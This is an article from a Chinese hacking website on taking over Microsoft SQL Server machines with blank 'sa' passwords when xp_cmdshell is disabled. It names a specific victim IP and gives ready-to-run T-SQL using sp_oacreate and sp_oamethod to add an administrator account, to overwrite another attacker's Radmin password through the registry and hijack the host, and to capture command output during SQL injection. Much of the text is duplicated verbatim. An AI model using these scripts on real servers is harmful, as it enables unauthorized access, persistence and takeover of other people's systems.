为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 电脑技术 查看内容

完全终结sa(一)

2009-2-11 03:12| 投稿: computer

摘要: 这里我事先找好了一台sa空密码的肉鸡 218.242.112.241,这台机器我已经试验过了,我再给大家演示一边吧 连接成功不过C:\>DIR C:\Canno...
这里我事先找好了一台sa空密码的肉鸡 218.242.112.241,这台机器我已经试验过了,我再给大家演示一边吧 连接成功不过C:\>DIR C:\Cannot load the DLL xplog70.dll, or one of the DLLs it references. Reason: 126(?ò2? 看样子没办法照平常方法入侵了我们先扫一下他的端口看看呵呵,端口开的挺多上面4999端口是我的radmin端口也就是大家平时说的4899接下来,我们拿出SQL查询分析器来这里我就演示致远SQL分析器这个了 呵呵,连接成功看到服务器开了3389,那我们加个NT帐号吧用下列语句,成功了,我们加了个hack帐号为了大家能直观的看到,我用rad检查一下吧看到了吧,加上去了那我们把它加入管理员组好,成了,我们拿3389连接器连接看看呵呵,上去了吧OK,破解即开了1433又开了3389的机器就是这么简单 好接下来我给大家演示怎么利用脚本抢别人的4899肉鸡,呵呵 这个4899肉鸡现在你不知道密码是无法登陆的,那我就去注册表修改密码我把他改成123456看以下脚本我在他的系统盘生成一个hack123.reg的注册表文件接下来就是写入注册表信息好,写好了现在我们导入到如成功删掉那个注册表文件OK了,我们再用123456连接4899肉鸡看看完毕 附加: 加NT帐号declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true' declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true' 修改RAD密码declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c echo Windows Registry Editor Version 5.00 > hack123.reg','0','true' declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] >> hack123.reg','0','true' declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c echo "Parameter"=hex:cf,c5,34,37,ad,b4,b7,63,5c,da,9f,d0,fc,61,f0,0b >> hack123.reg','0','true' declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'regedit /s hack123.reg','0','true' declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c del hack123.reg /f /q','0','true' 突破xplog70.dll终极技巧(续谈)原作者:不详 来 源:不详 发表日期: 4月14日 共有7位读者阅读过此文 ________________________________________前天做了个关于突破xplog70.dll的动画,昨天黑鹰发布了,呵呵,马上一堆小屁孩加我,要我帮他做肉鸡,晕哦!这里再公布一下那些脚本吧,这年头还是脚本吃香啊,哈哈加NT帐号declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true' 修改RAD密码declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c echo Windows Registry Editor Version 5.00 > hack123.reg','0','true'declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] >> hack123.reg','0','true'declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c echo 'Parameter'=hex:cf,c5,34,37,ad,b4,b7,63,5c,da,9f,d0,fc,61,f0,0b >> hack123.reg','0','true'declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'regedit /s hack123.reg','0','true'declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c del hack123.reg /f /q','0','true' rad的密码改成了123456,登上去后再用/pass:XXXXX来改就行了,抢肉鸡的感觉不错哦! 其实用OA的脚本可以突破的不只是这些,对于只开了1433端口的肉鸡也有办法突破,弄个上传不就行了,呵呵,shell上面传东西的方法还是挺多的!用Sp_oamethod调用Wscript.Shell的Run方法来执行CMD语句,添加用户renwoxin$,密码为test。“0”和“true”是RUN方法的参数:“0”可选。表示程序窗口外观的整数值,表示语句执行时隐藏CMD窗口,如果不加的话,在服务器上会有一个DOS窗口闪一下,容易暴露;“true”可选。布尔值,表示在继续执行脚本中的下一条语句之前,脚本是否等待执行完程序。如果设为True,则在执行完程序后才执行脚本,RUN方法返回由程序返回的任何错误代码。如果设为False(默认值),则RUN方法将自动在启动程序后立即返回0(不是错误代码)。   上面的代码执行后,SQL查询分析器返回一个0值,这表示执行成功了,再将renwoxin$提升为管理员: DECLARE @cmd INT EXEC sp_oacreate 'wscript.shell',@cmd output EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net localgroup administrators renwoxin$ /add','0','true' 这次又返回一个0值,还等什么,赶快从3389连过去看看,顺利进入!大家肯定会想到这个RUN可以执行几乎所有的CMD命令,只是如果你要看到结果,就需要自己构造表来存储了,大家可以发挥自己的想象力了!找到SQL安装目录下的Binn文件夹,发现其中的Xplog70.dll果然被删除了。再检查一下,用GetWebShell提交的ASP木马,内容居然是乱码!反正是不能执行,到现在我还是想不通是为什么,希望大侠们能著文传授。到此文章也该结束了,希望能尽快看 不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令 我的BLOG里有一篇文章介绍了关于SQL注入的基本原理和一些方法。最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句: EXEC master.dbo.xp_cmdshell 'dir c:\' 但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名,这时侯许多人也许会放弃,因为我们无法运行任何的cmd命令,很难查看对方计算机的文件、目录、开启的服务,也无法添加NT用户。 对此作过一番研究,后来我发现即使xp_cmdshell不可用了,还是有可能在服务器上运行CMD并得到回显结果的,这里要用到SQL服务器另外的几个系统存储过程:sp_OACreate,sp_OAGetProperty和sp_OAMethod。前提是服务器上的Wscript.shell和Scripting.FileSystemObject可用。sp_OACreate在 Microsoft? SQL Server? 实例上创建 OLE 对象实例。语法sp_OACreate progid, | clsid,objecttoken OUTPUT[ , context ]sp_OAGetProperty获取 OLE 对象的属性值。语法sp_OAGetProperty objecttoken,propertyname[, propertyvalue OUTPUT][, index...] sp_OAMethod调用 OLE 对象的方法。语法sp_OAMethod objecttoken,methodname[, returnvalue OUTPUT][ , [ @parametername = ] parameter [ OUTPUT ][...n]]思路:先在SQL Server 上建立一个Wscript.Shell,调用其run Method,将cmd.exe执行的结果输出到一个文件中,然后再建立一个Scripting.FileSystemObject,通过它建立一个TextStream对象,读出临时文件中的字符,一行一行的添加到一个临时表中。 以下是相应的SQL语句Create TABLE mytmp(info VARCHAR(400),ID IDENTITY (1, 1) NOT NULL)DECLARE @shell INTDECLARE @fso INTDECLARE @file INTDECLARE @isEnd BITDECLARE @out VARCHAR(400)EXEC sp_oacreate 'wscript.shell',@shell outputEXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。EXEC sp_oacreate 'scripting.filesystemobject',@fso outputEXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'--因为fso的opentextfile方法将返回一个textstream对象,所以此时@file是一个对象令牌 WHILE @shell>0BEGINEXEC sp_oamethod @file,'Readline',@out outInsert INTO MYTMP(info) VALUES (@out)EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd outIF @isEnd=1 BREAKELSE CONTINUEEND Drop TABLE MYTMP 注意:如果你在进行注入测试时使用这种方法就不能有这样多的换行,必须把它们合为一行,每个语句中间用空格符隔开。 突破xplog70.dll终极技巧 不过要知道MSSQLSERVER是与系统联系的非常紧密的,一般大家都知道XP_CMDSHELL这个存储过程可以执行DOS命令,但是还有个存储过程也可以执行DOS命令,知道的人就不多了,下面我就来简单的说一下:sp_oacreate和sp_oamethod两个过程分别用来创建和执行脚本语言,简单的说,基本DOS能执行的命令,用脚本就能执行,换言之就是xp_cmdshell能执行的sp_oacreate+sp_oamethod同样能胜任。好,说了这么多废话,我接下来还是给大家演示一下吧 需要的工具:SQL查询分析器分离版(我的win2003不能用,555555,大家可以下载下来试试)http://ww3.tty-1.net:808/newdown/show.php?id=303或者找一台带SQL的3389肉鸡,这里我就不提供了^_^上面两个都没条件使用的话可以下载致远SQL分析器,需要MicroSoft .net FrameWork 1.1的支持,如果是2003系统或已经装过的就直接用我压缩包的那个就行了,没有的话就去网络休闲庄下载完整版http://ww3.tty-1.net:808/newdown/show.php?id=301这个唯一一点不好的是无法辨认命令执行成功与否,不过一般按照我的步骤应该是没问题的其他工具参照其他从SA到3389相关文章即可,接下来开工 这里我事先找好了一台sa空密码的肉鸡 218.242.112.241,这台机器我已经试验过了,我再给大家演示一边吧 连接成功不过C:\>DIR C:\Cannot load the DLL xplog70.dll, or one of the DLLs it references. Reason: 126(?ò2? 看样子没办法照平常方法入侵了我们先扫一下他的端口看看呵呵,端口开的挺多上面4999端口是我的radmin端口也就是大家平时说的4899接下来,我们拿出SQL查询分析器来这里我就演示致远SQL分析器这个了 呵呵,连接成功看到服务器开了3389,那我们加个NT帐号吧用下列语句,成功了,我们加了个hack帐号为了大家能直观的看到,我用rad检查一下吧看到了吧,加上去了那我们把它加入管理员组好,成了,我们拿3389连接器连接看看呵呵,上去了吧OK,破解即开了1433又开了3389的机器就是这么简单 好接下来我给大家演示怎么利用脚本抢别人的4899肉鸡,呵呵 这个4899肉鸡现在你不知道密码是无法登陆的,那我就去注册表修改密码我把他改成123456看以下脚本我在他的系统盘生成一个hack123.reg的注册表文件接下来就是写入注册表信息好,写好了现在我们导入到如成功删掉那个注册表文件OK了,我们再用123456连接4899肉鸡看看完毕 附加: 加NT帐号declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true' declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true' 修改RAD密码declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c echo Windows Registry Editor Version 5.00 > hack123.reg','0','true' declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] >> hack123.reg','0','true' declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c echo "Parameter"=hex:cf,c5,34,37,ad,b4,b7,63,5c,da,9f,d0,fc,61,f0,0b >> hack123.reg','0','true' declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'regedit /s hack123.reg','0','true' declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c del hack123.reg /f /q','0','true' 突破xplog70.dll终极技巧(续谈)原作者:不详 来 源:不详 发表日期: 4月14日 共有7位读者阅读过此文 ________________________________________前天做了个关于突破xplog70.dll的动画,昨天黑鹰发布了,呵呵,马上一堆小屁孩加我,要我帮他做肉鸡,晕哦!这里再公布一下那些脚本吧,这年头还是脚本吃香啊,哈哈加NT帐号declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true' 修改RAD密码declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c echo Windows Registry Editor Version 5.00 > hack123.reg','0','true'declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] >> hack123.reg','0','true'declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c echo 'Parameter'=hex:cf,c5,34,37,ad,b4,b7,63,5c,da,9f,d0,fc,61,f0,0b >> hack123.reg','0','true'declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'regedit /s hack123.reg','0','true'declare @cmd INTexec sp_oacreate 'wscript.shell',@cmd outputexec sp_oamethod @cmd,'run',null,'cmd.exe /c del hack123.reg /f /q','0','true' rad的密码改成了123456,登上去后再用/pass:XXXXX来改就行了,抢肉鸡的感觉不错哦! 其实用OA的脚本可以突破的不只是这些,对于只开了1433端口的肉鸡也有办法突破,弄个上传不就行了,呵呵,shell上面传东西的方法还是挺多的!

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部